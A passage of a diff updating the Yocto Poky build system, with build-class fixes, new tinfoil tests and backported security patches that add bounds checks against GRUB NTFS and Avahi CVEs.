-fdebug-prefix-map=${STAGING_KERNEL_DIR}=${KERNEL_SRC_PATH} -fdebug-prefix-map=${STAGING_KERNEL_BUILDDIR}=${KERNEL_SRC_PATH}" -KERNEL_LD = "${CCACHE}${HOST_PREFIX}ld.bfd ${HOST_LD_KERNEL_ARCH}" -KERNEL_AR = "${CCACHE}${HOST_PREFIX}ar ${HOST_AR_KERNEL_ARCH}" -KERNEL_OBJCOPY = "${CCACHE}${HOST_PREFIX}objcopy ${HOST_OBJCOPY_KERNEL_ARCH}" +KERNEL_LD = "${HOST_PREFIX}ld.bfd ${HOST_LD_KERNEL_ARCH}" +KERNEL_AR = "${HOST_PREFIX}ar ${HOST_AR_KERNEL_ARCH}" +KERNEL_OBJCOPY = "${HOST_PREFIX}objcopy ${HOST_OBJCOPY_KERNEL_ARCH}" KERNEL_STRIP = "${HOST_PREFIX}strip ${HOST_STRIP_KERNEL_ARCH}" TOOLCHAIN ?= "gcc" diff --git a/poky/meta/classes-recipe/kernel-yocto.bbclass b/poky/meta/classes-recipe/kernel-yocto.bbclass index 4ac977b122..4b7c0b829f 100644 --- a/poky/meta/classes-recipe/kernel-yocto.bbclass +++ b/poky/meta/classes-recipe/kernel-yocto.bbclass @@ -176,12 +176,32 @@ do_kernel_metadata() { # kernel source tree, where they'll be used later. check_git_config patches="${@" ".join(find_patches(d,'kernel-meta'))}" - for p in $patches; do + if [ -n "$patches" ]; then ( - cd ${WORKDIR}/kernel-meta - git am -s $p - ) - done + cd ${WORKDIR}/kernel-meta + + # take the SRC_URI patches, and create a series file + # this is required to support some better processing + # of issues with the patches + rm -f series + for p in $patches; do + cp $p . + echo "$(basename $p)" >> series + done + + # process the series with kgit-s2q, which is what is + # handling the rest of the kernel. This allows us + # more flexibility for handling failures or advanced + # mergeing functinoality + message=$(kgit-s2q --gen -v --patches ${WORKDIR}/kernel-meta 2>&1) + if [ $? -ne 0 ]; then + # setup to try the patch again + kgit-s2q --prev + bberror "Problem applying patches to: ${WORKDIR}/kernel-meta" + bbfatal_log "\n($message)" + fi + ) + fi fi sccs_from_src_uri="${@" ".join(find_sccs(d))}" diff --git a/poky/meta/classes-recipe/meson.bbclass b/poky/meta/classes-recipe/meson.bbclass index d08a83d555..a85d120d77 100644 --- a/poky/meta/classes-recipe/meson.bbclass +++ b/poky/meta/classes-recipe/meson.bbclass @@ -79,7 +79,7 @@ llvm-config = 'llvm-config' cups-config = 'cups-config' g-ir-scanner = '${STAGING_BINDIR}/g-ir-scanner-wrapper' g-ir-compiler = '${STAGING_BINDIR}/g-ir-compiler-wrapper' -${@rust_tool(d, "HOST_SYS")} +${@rust_tool(d, "RUST_HOST_SYS")} ${@"exe_wrapper = '${WORKDIR}/meson-qemuwrapper'" if d.getVar('EXEWRAPPER_ENABLED') == 'True' else ""} [built-in options] @@ -116,7 +116,7 @@ readelf = ${@meson_array('BUILD_READELF', d)} objcopy = ${@meson_array('BUILD_OBJCOPY', d)} llvm-config = '${STAGING_BINDIR_NATIVE}/llvm-config' pkgconfig = 'pkg-config-native' -${@rust_tool(d, "BUILD_SYS")} +${@rust_tool(d, "RUST_BUILD_SYS")} [built-in options] c_args = ${@meson_array('BUILD_CFLAGS', d)} diff --git a/poky/meta/classes-recipe/rootfs-postcommands.bbclass b/poky/meta/classes-recipe/rootfs-postcommands.bbclass index 06388b72fb..29ee74932a 100644 --- a/poky/meta/classes-recipe/rootfs-postcommands.bbclass +++ b/poky/meta/classes-recipe/rootfs-postcommands.bbclass @@ -241,10 +241,10 @@ read_only_rootfs_hook () { # zap_empty_root_password () { if [ -e ${IMAGE_ROOTFS}/etc/shadow ]; then - sed -i 's%^root::%root:*:%' ${IMAGE_ROOTFS}/etc/shadow + sed --follow-symlinks -i 's%^root::%root:*:%' ${IMAGE_ROOTFS}/etc/shadow fi if [ -e ${IMAGE_ROOTFS}/etc/passwd ]; then - sed -i 's%^root::%root:*:%' ${IMAGE_ROOTFS}/etc/passwd + sed --follow-symlinks -i 's%^root::%root:*:%' ${IMAGE_ROOTFS}/etc/passwd fi } diff --git a/poky/meta/classes-recipe/testimage.bbclass b/poky/meta/classes-recipe/testimage.bbclass index 7c56fe9674..f36d941891 100644 --- a/poky/meta/classes-recipe/testimage.bbclass +++ b/poky/meta/classes-recipe/testimage.bbclass @@ -109,21 +109,6 @@ TESTIMAGE_DUMP_DIR ?= "${LOG_DIR}/runtime-hostdump/" TESTIMAGE_UPDATE_VARS ?= "DL_DIR WORKDIR DEPLOY_DIR_IMAGE IMAGE_LINK_NAME" -testimage_dump_target () { - top -bn1 - ps - free - df - # The next command will export the default gateway IP - export DEFAULT_GATEWAY=$(ip route | awk '/default/ { print $3}') - ping -c3 $DEFAULT_GATEWAY - dmesg - netstat -an - ip address - # Next command will dump logs from /var/log/ - find /var/log/ -type f 2>/dev/null -exec echo "====================" \; -exec echo {} \; -exec echo "====================" \; -exec cat {} \; -exec echo "" \; -} - testimage_dump_monitor () { query-status query-block @@ -352,7 +337,6 @@ def testimage_main(d): target_kwargs['serialcontrol_cmd'] = d.getVar("TEST_SERIALCONTROL_CMD") or None target_kwargs['serialcontrol_extra_args'] = d.getVar("TEST_SERIALCONTROL_EXTRA_ARGS") or "" target_kwargs['testimage_dump_monitor'] = d.getVar("testimage_dump_monitor") or "" - target_kwargs['testimage_dump_target'] = d.getVar("testimage_dump_target") or "" def export_ssh_agent(d): import os diff --git a/poky/meta/classes/useradd_base.bbclass b/poky/meta/classes/useradd_base.bbclass index 863cb7b76c..5e1c699118 100644 --- a/poky/meta/classes/useradd_base.bbclass +++ b/poky/meta/classes/useradd_base.bbclass @@ -160,7 +160,7 @@ perform_passwd_expire () { local username=`echo "$opts" | awk '{ print $NF }'` local user_exists="`grep "^$username:" $rootdir/etc/passwd || true`" if test "x$user_exists" != "x"; then - eval flock -x $rootdir${sysconfdir} -c \"$PSEUDO sed -i \''s/^\('$username':[^:]*\):[^:]*:/\1:0:/'\' $rootdir/etc/shadow \" || true + eval flock -x $rootdir${sysconfdir} -c \"$PSEUDO sed --follow-symlinks -i \''s/^\('$username':[^:]*\):[^:]*:/\1:0:/'\' $rootdir/etc/shadow \" || true local passwd_lastchanged="`grep "^$username:" $rootdir/etc/shadow | cut -d: -f3`" if test "x$passwd_lastchanged" != "x0"; then bbfatal "${PN}: passwd --expire operation did not succeed." diff --git a/poky/meta/conf/distro/include/security_flags.inc b/poky/meta/conf/distro/include/security_flags.inc index 2972f05b4e..d97a6edb0f 100644 --- a/poky/meta/conf/distro/include/security_flags.inc +++ b/poky/meta/conf/distro/include/security_flags.inc @@ -69,4 +69,3 @@ SECURITY_LDFLAGS:pn-xserver-xorg = "${SECURITY_X_LDFLAGS}" TARGET_CC_ARCH:append:pn-binutils = " ${SELECTED_OPTIMIZATION}" TARGET_CC_ARCH:append:pn-gcc = " ${SELECTED_OPTIMIZATION}" TARGET_CC_ARCH:append:pn-gdb = " ${SELECTED_OPTIMIZATION}" -TARGET_CC_ARCH:append:pn-perf = " ${SELECTED_OPTIMIZATION}" diff --git a/poky/meta/lib/oe/buildcfg.py b/poky/meta/lib/oe/buildcfg.py index 90f5e05715..b3fe510309 100644 --- a/poky/meta/lib/oe/buildcfg.py +++ b/poky/meta/lib/oe/buildcfg.py @@ -1,26 +1,27 @@ +import os import subprocess import bb.process def detect_revision(d): path = get_scmbasepath(d) - return get_metadata_git_revision(path, d) + return get_metadata_git_revision(path) def detect_branch(d): path = get_scmbasepath(d) - return get_metadata_git_branch(path, d) + return get_metadata_git_branch(path) def get_scmbasepath(d): return os.path.join(d.getVar('COREBASE'), 'meta') -def get_metadata_git_branch(path, d): +def get_metadata_git_branch(path): try: rev, _ = bb.process.run('git rev-parse --abbrev-ref HEAD', cwd=path) except bb.process.ExecutionError: rev = '<unknown>' return rev.strip() -def get_metadata_git_revision(path, d): +def get_metadata_git_revision(path): try: rev, _ = bb.process.run('git rev-parse HEAD', cwd=path) except bb.process.ExecutionError: @@ -45,5 +46,5 @@ def get_layer_revisions(d): layers = (d.getVar("BBLAYERS") or "").split() revisions = [] for i in layers: - revisions.append((i, os.path.basename(i), get_metadata_git_branch(i, None).strip(), get_metadata_git_revision(i, None), is_layer_modified(i))) + revisions.append((i, os.path.basename(i), get_metadata_git_branch(i).strip(), get_metadata_git_revision(i), is_layer_modified(i))) return revisions diff --git a/poky/meta/lib/oe/patch.py b/poky/meta/lib/oe/patch.py index ff9afc9df9..9b480b2b28 100644 --- a/poky/meta/lib/oe/patch.py +++ b/poky/meta/lib/oe/patch.py @@ -772,8 +772,9 @@ class NOOPResolver(Resolver): self.patchset.Push() except Exception: import sys - os.chdir(olddir) raise + finally: + os.chdir(olddir) # Patch resolver which relies on the user doing all the work involved in the # resolution, with the exception of refreshing the remote copy of the patch @@ -833,9 +834,9 @@ class UserResolver(Resolver): # User did not fix the problem. Abort. raise PatchError("Patch application failed, and user did not fix and refresh the patch.") except Exception: - os.chdir(olddir) raise - os.chdir(olddir) + finally: + os.chdir(olddir) def patch_path(url, fetch, workdir, expand=True): diff --git a/poky/meta/lib/oe/path.py b/poky/meta/lib/oe/path.py index 0dc8f172d5..e2f1913a35 100644 --- a/poky/meta/lib/oe/path.py +++ b/poky/meta/lib/oe/path.py @@ -125,7 +125,8 @@ def copyhardlinktree(src, dst): if os.path.isdir(src): if len(glob.glob('%s/.??*' % src)) > 0: source = './.??* ' - source += './*' + if len(glob.glob('%s/**' % src)) > 0: + source += './*' s_dir = src else: source = src diff --git a/poky/meta/lib/oe/utils.py b/poky/meta/lib/oe/utils.py index a3b1bb1087..14a7d07ef0 100644 --- a/poky/meta/lib/oe/utils.py +++ b/poky/meta/lib/oe/utils.py @@ -7,6 +7,7 @@ import subprocess import multiprocessing import traceback +import errno def read_file(filename): try: @@ -528,3 +529,14 @@ def directory_size(root, blocksize=4096): total += sum(roundup(getsize(os.path.join(root, name))) for name in files) total += roundup(getsize(root)) return total + +# Update the mtime of a file, skip if permission/read-only issues +def touch(filename): + try: + os.utime(filename, None) + except PermissionError: + pass + except OSError as e: + # Handle read-only file systems gracefully + if e.errno != errno.EROFS: + raise e diff --git a/poky/meta/lib/oeqa/core/target/qemu.py b/poky/meta/lib/oeqa/core/target/qemu.py index 6893d10226..d93b3ac94a 100644 --- a/poky/meta/lib/oeqa/core/target/qemu.py +++ b/poky/meta/lib/oeqa/core/target/qemu.py @@ -14,8 +14,6 @@ from collections import defaultdict from .ssh import OESSHTarget from oeqa.utils.qemurunner import QemuRunner -from oeqa.utils.dump import MonitorDumper -from oeqa.utils.dump import TargetDumper supported_fstypes = ['ext3', 'ext4', 'cpio.gz', 'wic'] @@ -47,14 +45,6 @@ class OEQemuTarget(OESSHTarget): use_kvm=kvm, use_slirp=slirp, dump_dir=dump_dir, logger=logger, serial_ports=serial_ports, boot_patterns = boot_patterns, use_ovmf=ovmf, tmpfsdir=tmpfsdir) - dump_monitor_cmds = kwargs.get("testimage_dump_monitor") - self.monitor_dumper = MonitorDumper(dump_monitor_cmds, dump_dir, self.runner) - if self.monitor_dumper: - self.monitor_dumper.create_dir("qmp") - - dump_target_cmds = kwargs.get("testimage_dump_target") - self.target_dumper = TargetDumper(dump_target_cmds, dump_dir, self.runner) - self.target_dumper.create_dir("qemu") def start(self, params=None, extra_bootparams=None, runqemuparams=''): if self.use_slirp and not self.server_ip: diff --git a/poky/meta/lib/oeqa/core/target/ssh.py b/poky/meta/lib/oeqa/core/target/ssh.py index f4dd0ca417..09cdd14c75 100644 --- a/poky/meta/lib/oeqa/core/target/ssh.py +++ b/poky/meta/lib/oeqa/core/target/ssh.py @@ -48,8 +48,6 @@ class OESSHTarget(OETarget): if port: self.ssh = self.ssh + [ '-p', port ] self.scp = self.scp + [ '-P', port ] - self._monitor_dumper = None - self.target_dumper = None def start(self, **kwargs): pass @@ -57,15 +55,6 @@ class OESSHTarget(OETarget): def stop(self, **kwargs): pass - @property - def monitor_dumper(self): - return self._monitor_dumper - - @monitor_dumper.setter - def monitor_dumper(self, dumper): - self._monitor_dumper = dumper - self.monitor_dumper.dump_monitor() - def _run(self, command, timeout=None, ignore_status=True): """ Runs command in target using SSHProcess. @@ -104,14 +93,7 @@ class OESSHTarget(OETarget): status, output = self._run(sshCmd, processTimeout, ignore_status) self.logger.debug('Command: %s\nStatus: %d Output: %s\n' % (command, status, output)) - if (status == 255) and (('No route to host') in output): - if self.monitor_dumper: - self.monitor_dumper.dump_monitor() - if status == 255: - if self.target_dumper: - self.target_dumper.dump_target() - if self.monitor_dumper: - self.monitor_dumper.dump_monitor() + return (status, output) def copyTo(self, localSrc, remoteDst): diff --git a/poky/meta/lib/oeqa/selftest/cases/tinfoil.py b/poky/meta/lib/oeqa/selftest/cases/tinfoil.py index dd13c20402..21c8686b2a 100644 --- a/poky/meta/lib/oeqa/selftest/cases/tinfoil.py +++ b/poky/meta/lib/oeqa/selftest/cases/tinfoil.py @@ -48,6 +48,17 @@ class TinfoilTests(OESelftestTestCase): rd = tinfoil.parse_recipe_file(best[3]) self.assertEqual(testrecipe, rd.getVar('PN')) + def test_parse_virtual_recipe(self): + with bb.tinfoil.Tinfoil() as tinfoil: + tinfoil.prepare(config_only=False, quiet=2) + testrecipe = 'nativesdk-gcc' + best = tinfoil.find_best_provider(testrecipe) + if not best: + self.fail('Unable to find recipe providing %s' % testrecipe) + rd = tinfoil.parse_recipe_file(best[3]) + self.assertEqual(testrecipe, rd.getVar('PN')) + self.assertIsNotNone(rd.getVar('FILE_LAYERNAME')) + def test_parse_recipe_copy_expand(self): with bb.tinfoil.Tinfoil() as tinfoil: tinfoil.prepare(config_only=False, quiet=2) @@ -66,7 +77,7 @@ class TinfoilTests(OESelftestTestCase): localdata.setVar('PN', 'hello') self.assertEqual('hello', localdata.getVar('BPN')) - # The config_data API tp parse_recipe_file is used by: + # The config_data API to parse_recipe_file is used by: # layerindex-web layerindex/update_layer.py def test_parse_recipe_custom_data(self): with bb.tinfoil.Tinfoil() as tinfoil: @@ -80,6 +91,18 @@ class TinfoilTests(OESelftestTestCase): rd = tinfoil.parse_recipe_file(best[3], config_data=localdata) self.assertEqual("testval", rd.getVar('TESTVAR')) + def test_parse_virtual_recipe_custom_data(self): + with bb.tinfoil.Tinfoil() as tinfoil: + tinfoil.prepare(config_only=False, quiet=2) + localdata = bb.data.createCopy(tinfoil.config_data) + localdata.setVar("TESTVAR", "testval") + testrecipe = 'nativesdk-gcc' + best = tinfoil.find_best_provider(testrecipe) + if not best: + self.fail('Unable to find recipe providing %s' % testrecipe) + rd = tinfoil.parse_recipe_file(best[3], config_data=localdata) + self.assertEqual("testval", rd.getVar('TESTVAR')) + def test_list_recipes(self): with bb.tinfoil.Tinfoil() as tinfoil: tinfoil.prepare(config_only=False, quiet=2) diff --git a/poky/meta/lib/oeqa/targetcontrol.py b/poky/meta/lib/oeqa/targetcontrol.py index e21655c979..6e8b781973 100644 --- a/poky/meta/lib/oeqa/targetcontrol.py +++ b/poky/meta/lib/oeqa/targetcontrol.py @@ -103,7 +103,6 @@ class QemuTarget(BaseTarget): self.rootfs = os.path.join(d.getVar("DEPLOY_DIR_IMAGE"), d.getVar("IMAGE_LINK_NAME") + '.' + self.image_fstype) self.kernel = os.path.join(d.getVar("DEPLOY_DIR_IMAGE"), d.getVar("KERNEL_IMAGETYPE", False) + '-' + d.getVar('MACHINE', False) + '.bin') self.qemulog = os.path.join(self.testdir, "qemu_boot_log.%s" % self.datetime) - dump_target_cmds = d.getVar("testimage_dump_target") dump_monitor_cmds = d.getVar("testimage_dump_monitor") dump_dir = d.getVar("TESTIMAGE_DUMP_DIR") if not dump_dir: @@ -144,7 +143,6 @@ class QemuTarget(BaseTarget): tmpfsdir = d.getVar("RUNQEMU_TMPFS_DIR"), serial_ports = len(d.getVar("SERIAL_CONSOLES").split())) - self.target_dumper = TargetDumper(dump_target_cmds, dump_dir, self.runner) self.monitor_dumper = MonitorDumper(dump_monitor_cmds, dump_dir, self.runner) if (self.monitor_dumper): self.monitor_dumper.create_dir("qmp") diff --git a/poky/meta/lib/patchtest/tests/test_patch.py b/poky/meta/lib/patchtest/tests/test_patch.py index 65d0f930b0..d7187a0cb1 100644 --- a/poky/meta/lib/patchtest/tests/test_patch.py +++ b/poky/meta/lib/patchtest/tests/test_patch.py @@ -6,6 +6,7 @@ # import base +import os import parse_signed_off_by import parse_upstream_status import pyparsing @@ -87,7 +88,7 @@ class TestPatch(base.Base): if TestPatch.prog.search_string(payload): break else: - self.fail('A patch file has been added without a Signed-off-by tag. Sign off the added patch file (%s)' % newpatch.path) + self.fail('A patch file has been added without a Signed-off-by tag: \'%s\'' % os.path.basename(newpatch.path)) def test_cve_tag_format(self): for commit in TestPatch.commits: diff --git a/poky/meta/recipes-bsp/grub/files/CVE-2023-4692.patch b/poky/meta/recipes-bsp/grub/files/CVE-2023-4692.patch new file mode 100644 index 0000000000..4780e35b7a --- /dev/null +++ b/poky/meta/recipes-bsp/grub/files/CVE-2023-4692.patch @@ -0,0 +1,97 @@ +From 43651027d24e62a7a463254165e1e46e42aecdea Mon Sep 17 00:00:00 2001 +From: Maxim Suhanov <dfirblog@gmail.com> +Date: Thu, 16 Nov 2023 07:21:50 +0000 +Subject: [PATCH] fs/ntfs: Fix an OOB write when parsing the $ATTRIBUTE_LIST + attribute for the $MFT file + +When parsing an extremely fragmented $MFT file, i.e., the file described +using the $ATTRIBUTE_LIST attribute, current NTFS code will reuse a buffer +containing bytes read from the underlying drive to store sector numbers, +which are consumed later to read data from these sectors into another buffer. + +These sectors numbers, two 32-bit integers, are always stored at predefined +offsets, 0x10 and 0x14, relative to first byte of the selected entry within +the $ATTRIBUTE_LIST attribute. Usually, this won't cause any problem. + +However, when parsing a specially-crafted file system image, this may cause +the NTFS code to write these integers beyond the buffer boundary, likely +causing the GRUB memory allocator to misbehave or fail. These integers contain +values which are controlled by on-disk structures of the NTFS file system. + +Such modification and resulting misbehavior may touch a memory range not +assigned to the GRUB and owned by firmware or another EFI application/driver. + +This fix introduces checks to ensure that these sector numbers are never +written beyond the boundary. + +Fixes: CVE-2023-4692 + +Reported-by: Maxim Suhanov <dfirblog@gmail.com> +Signed-off-by: Maxim Suhanov <dfirblog@gmail.com> +Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com> + +CVE: CVE-2023-4692 +Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=43651027d24e62a7a463254165e1e46e42aecdea] + +Signed-off-by: Yogita Urade <yogita.urade@windriver.com> +--- + grub-core/fs/ntfs.c | 18 +++++++++++++++++- + 1 file changed, 17 insertions(+), 1 deletion(-) + +diff --git a/grub-core/fs/ntfs.c b/grub-core/fs/ntfs.c +index 2f34f76..6009e49 100644 +--- a/grub-core/fs/ntfs.c ++++ b/grub-core/fs/ntfs.c +@@ -184,7 +184,7 @@ find_attr (struct grub_ntfs_attr *at, grub_uint8_t attr) + } + if (at->attr_end) + { +- grub_uint8_t *pa; ++ grub_uint8_t *pa, *pa_end; + + at->emft_buf = grub_malloc (at->mft->data->mft_size << GRUB_NTFS_BLK_SHR); + if (at->emft_buf == NULL) +@@ -209,11 +209,13 @@ find_attr (struct grub_ntfs_attr *at, grub_uint8_t attr) + } + at->attr_nxt = at->edat_buf; + at->attr_end = at->edat_buf + u32at (pa, 0x30); ++ pa_end = at->edat_buf + n; + } + else + { + at->attr_nxt = at->attr_end + u16at (pa, 0x14); + at->attr_end = at->attr_end + u32at (pa, 4); ++ pa_end = at->mft->buf + (at->mft->data->mft_size << GRUB_NTFS_BLK_SHR); + } + at->flags |= GRUB_NTFS_AF_ALST; + while (at->attr_nxt < at->attr_end) +@@ -230,6 +232,13 @@ find_attr (struct grub_ntfs_attr *at, grub_uint8_t attr) + at->flags |= GRUB_NTFS_AF_GPOS; + at->attr_cur = at->attr_nxt; + pa = at->attr_cur; ++ ++ if ((pa >= pa_end) || (pa_end - pa < 0x18)) ++ { ++ grub_error (GRUB_ERR_BAD_FS, "can\'t parse attribute list"); ++ return NULL; ++ } ++ + grub_set_unaligned32 ((char *) pa + 0x10, + grub_cpu_to_le32 (at->mft->data->mft_start)); + grub_set_unaligned32 ((char *) pa + 0x14, +@@ -240,6 +249,13 @@ find_attr (struct grub_ntfs_attr *at, grub_uint8_t attr) + { + if (*pa != attr) + break; ++ ++ if ((pa >= pa_end) || (pa_end - pa < 0x18)) ++ { ++ grub_error (GRUB_ERR_BAD_FS, "can\'t parse attribute list"); ++ return NULL; ++ } ++ + if (read_attr + (at, pa + 0x10, + u32at (pa, 0x10) * (at->mft->data->mft_size << GRUB_NTFS_BLK_SHR), +-- +2.40.0 diff --git a/poky/meta/recipes-bsp/grub/files/CVE-2023-4693.patch b/poky/meta/recipes-bsp/grub/files/CVE-2023-4693.patch new file mode 100644 index 0000000000..1b6013d86d --- /dev/null +++ b/poky/meta/recipes-bsp/grub/files/CVE-2023-4693.patch @@ -0,0 +1,62 @@ +From 0ed2458cc4eff6d9a9199527e2a0b6d445802f94 Mon Sep 17 00:00:00 2001 +From: Maxim Suhanov <dfirblog@gmail.com> +Date: Mon, 28 Aug 2023 16:32:33 +0300 +Subject: [PATCH] fs/ntfs: Fix an OOB read when reading data from the resident + $DATA attribute + +When reading a file containing resident data, i.e., the file data is stored in +the $DATA attribute within the NTFS file record, not in external clusters, +there are no checks that this resident data actually fits the corresponding +file record segment. + +When parsing a specially-crafted file system image, the current NTFS code will +read the file data from an arbitrary, attacker-chosen memory offset and of +arbitrary, attacker-chosen length. + +This allows an attacker to display arbitrary chunks of memory, which could +contain sensitive information like password hashes or even plain-text, +obfuscated passwords from BS EFI variables. + +This fix implements a check to ensure that resident data is read from the +corresponding file record segment only. + +Fixes: CVE-2023-4693 + +Reported-by: Maxim Suhanov <dfirblog@gmail.com> +Signed-off-by: Maxim Suhanov <dfirblog@gmail.com> +Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com> + +Upstream-Status: Backport [https://git.savannah.gnu.org/gitweb/?p=grub.git;a=commit;h=0ed2458cc4eff6d9a9199527e2a0b6d445802f94] +CVE: CVE-2023-4693 +Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com> +--- + grub-core/fs/ntfs.c | 13 ++++++++++++- + 1 file changed, 12 insertions(+), 1 deletion(-) + +diff --git a/grub-core/fs/ntfs.c b/grub-core/fs/ntfs.c +index 7e43fd6..8f63c83 100644 +--- a/grub-core/fs/ntfs.c ++++ b/grub-core/fs/ntfs.c +@@ -401,7 +401,18 @@ read_data (struct grub_ntfs_attr *at, grub_uint8_t *pa, grub_uint8_t *dest, + { + if (ofs + len > u32at (pa, 0x10)) + return grub_error (GRUB_ERR_BAD_FS, "read out of range"); +- grub_memcpy (dest, pa + u32at (pa, 0x14) + ofs, len); ++ ++ if (u32at (pa, 0x10) > (at->mft->data->mft_size << GRUB_NTFS_BLK_SHR)) ++ return grub_error (GRUB_ERR_BAD_FS, "resident attribute too large"); ++ ++ if (pa >= at->mft->buf + (at->mft->data->mft_size << GRUB_NTFS_BLK_SHR)) ++ return grub_error (GRUB_ERR_BAD_FS, "resident attribute out of range"); ++ ++ if (u16at (pa, 0x14) + u32at (pa, 0x10) > ++ (grub_addr_t) at->mft->buf + (at->mft->data->mft_size << GRUB_NTFS_BLK_SHR) - (grub_addr_t) pa) ++ return grub_error (GRUB_ERR_BAD_FS, "resident attribute out of range"); ++ ++ grub_memcpy (dest, pa + u16at (pa, 0x14) + ofs, len); + return 0; + } + +-- +2.25.1 + diff --git a/poky/meta/recipes-bsp/grub/grub2.inc b/poky/meta/recipes-bsp/grub/grub2.inc index 41839698dc..f594e7d3a4 100644 --- a/poky/meta/recipes-bsp/grub/grub2.inc +++ b/poky/meta/recipes-bsp/grub/grub2.inc @@ -42,6 +42,8 @@ SRC_URI = "${GNU_MIRROR}/grub/grub-${PV}.tar.gz \ file://CVE-2022-3775.patch \ file://0001-risc-v-Handle-R_RISCV_CALL_PLT-reloc.patch \ file://0001-fs-ext2-Ignore-checksum-seed-incompat-feature.patch \ + file://CVE-2023-4692.patch \ + file://CVE-2023-4693.patch \ " SRC_URI[sha256sum] = "23b64b4c741569f9426ed2e3d0e6780796fca081bee4c99f62aa3f53ae803f5f" diff --git a/poky/meta/recipes-connectivity/avahi/avahi_0.8.bb b/poky/meta/recipes-connectivity/avahi/avahi_0.8.bb index 4c830cc058..bfd945c7ae 100644 --- a/poky/meta/recipes-connectivity/avahi/avahi_0.8.bb +++ b/poky/meta/recipes-connectivity/avahi/avahi_0.8.bb @@ -26,6 +26,15 @@ SRC_URI = "${GITHUB_BASE_URI}/download/v${PV}/avahi-${PV}.tar.gz \ file://handle-hup.patch \ file://local-ping.patch \ file://invalid-service.patch \ + file://CVE-2023-1981.patch \ + file://CVE-2023-38469-1.patch \ + file://CVE-2023-38469-2.patch \ + file://CVE-2023-38470-1.patch \ + file://CVE-2023-38470-2.patch \ + file://CVE-2023-38471-1.patch \ + file://CVE-2023-38471-2.patch \ + file://CVE-2023-38472.patch \ + file://CVE-2023-38473.patch \ " GITHUB_BASE_URI = "https://github.com/lathiat/avahi/releases/" diff --git a/poky/meta/recipes-connectivity/avahi/files/CVE-2023-1981.patch b/poky/meta/recipes-connectivity/avahi/files/CVE-2023-1981.patch new file mode 100644 index 0000000000..4d7924d13a --- /dev/null +++ b/poky/meta/recipes-connectivity/avahi/files/CVE-2023-1981.patch @@ -0,0 +1,58 @@ +From a2696da2f2c50ac43b6c4903f72290d5c3fa9f6f Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?Petr=20Men=C5=A1=C3=ADk?= <pemensik@redhat.com> +Date: Thu, 17 Nov 2022 01:51:53 +0100 +Subject: [PATCH] Emit error if requested service is not found + +It currently just crashes instead of replying with error. Check return +value and emit error instead of passing NULL pointer to reply. + +Fixes #375 + +Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-1981.patch?h=ubuntu/jammy-security +Upstream commit https://github.com/lathiat/avahi/commit/a2696da2f2c50ac43b6c4903f72290d5c3fa9f6f] +CVE: CVE-2023-1981 +Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> +--- + avahi-daemon/dbus-protocol.c | 20 ++++++++++++++------ + 1 file changed, 14 insertions(+), 6 deletions(-) + +diff --git a/avahi-daemon/dbus-protocol.c b/avahi-daemon/dbus-protocol.c +index 70d7687bc..406d0b441 100644 +--- a/avahi-daemon/dbus-protocol.c ++++ b/avahi-daemon/dbus-protocol.c +@@ -375,10 +375,14 @@ static DBusHandlerResult dbus_get_alternative_host_name(DBusConnection *c, DBusM + } + + t = avahi_alternative_host_name(n); +- avahi_dbus_respond_string(c, m, t); +- avahi_free(t); ++ if (t) { ++ avahi_dbus_respond_string(c, m, t); ++ avahi_free(t); + +- return DBUS_HANDLER_RESULT_HANDLED; ++ return DBUS_HANDLER_RESULT_HANDLED; ++ } else { ++ return avahi_dbus_respond_error(c, m, AVAHI_ERR_NOT_FOUND, "Hostname not found"); ++ } + } + + static DBusHandlerResult dbus_get_alternative_service_name(DBusConnection *c, DBusMessage *m, DBusError *error) { +@@ -389,10 +393,14 @@ static DBusHandlerResult dbus_get_alternative_service_name(DBusConnection *c, DB + } + + t = avahi_alternative_service_name(n); +- avahi_dbus_respond_string(c, m, t); +- avahi_free(t); ++ if (t) { ++ avahi_dbus_respond_string(c, m, t); ++ avahi_free(t); + +- return DBUS_HANDLER_RESULT_HANDLED; ++ return DBUS_HANDLER_RESULT_HANDLED; ++ } else { ++ return avahi_dbus_respond_error(c, m, AVAHI_ERR_NOT_FOUND, "Service not found"); ++ } + } + + static DBusHandlerResult dbus_create_new_entry_group(DBusConnection *c, DBusMessage *m, DBusError *error) { diff --git a/poky/meta/recipes-connectivity/avahi/files/CVE-2023-38469-1.patch b/poky/meta/recipes-connectivity/avahi/files/CVE-2023-38469-1.patch new file mode 100644 index 0000000000..85345edc10 --- /dev/null +++ b/poky/meta/recipes-connectivity/avahi/files/CVE-2023-38469-1.patch @@ -0,0 +1,48 @@ +From a337a1ba7d15853fb56deef1f464529af6e3a1cf Mon Sep 17 00:00:00 2001 +From: Evgeny Vereshchagin <evvers@ya.ru> +Date: Mon, 23 Oct 2023 20:29:31 +0000 +Subject: [PATCH] core: reject overly long TXT resource records + +Closes https://github.com/lathiat/avahi/issues/455 + +CVE-2023-38469 + +Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/avahi/tree/debian/patches/CVE-2023-38469-1.patch?h=ubuntu/jammy-security +Upstream commit https://github.com/lathiat/avahi/commit/a337a1ba7d15853fb56deef1f464529af6e3a1cf] +CVE: CVE-2023-38469 +Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> +--- + avahi-core/rr.c | 9 ++++++++- + 1 file changed, 8 insertions(+), 1 deletion(-) + +Index: avahi-0.8/avahi-core/rr.c +=================================================================== +--- avahi-0.8.orig/avahi-core/rr.c ++++ avahi-0.8/avahi-core/rr.c +@@ -32,6 +32,7 @@ + #include <avahi-common/malloc.h> + #include <avahi-common/defs.h> + ++#include "dns.h" + #include "rr.h" + #include "log.h" + #include "util.h" +@@ -688,11 +689,17 @@ int avahi_record_is_valid(AvahiRecord *r + case AVAHI_DNS_TYPE_TXT: { + + AvahiStringList *strlst; ++ size_t used = 0; + +- for (strlst = r->data.txt.string_list; strlst; strlst = strlst->next) ++ for (strlst = r->data.txt.string_list; strlst; strlst = strlst->next) { + if (strlst->size > 255 || strlst->size <= 0) + return 0; + ++ used += 1+strlst->size; ++ if (used > AVAHI_DNS_RDATA_MAX) ++ return 0; ++ } ++ + return 1; + } + } diff --git a/poky/meta/recipes-connectivity/avahi/files/CVE-2023-38469-2.patch 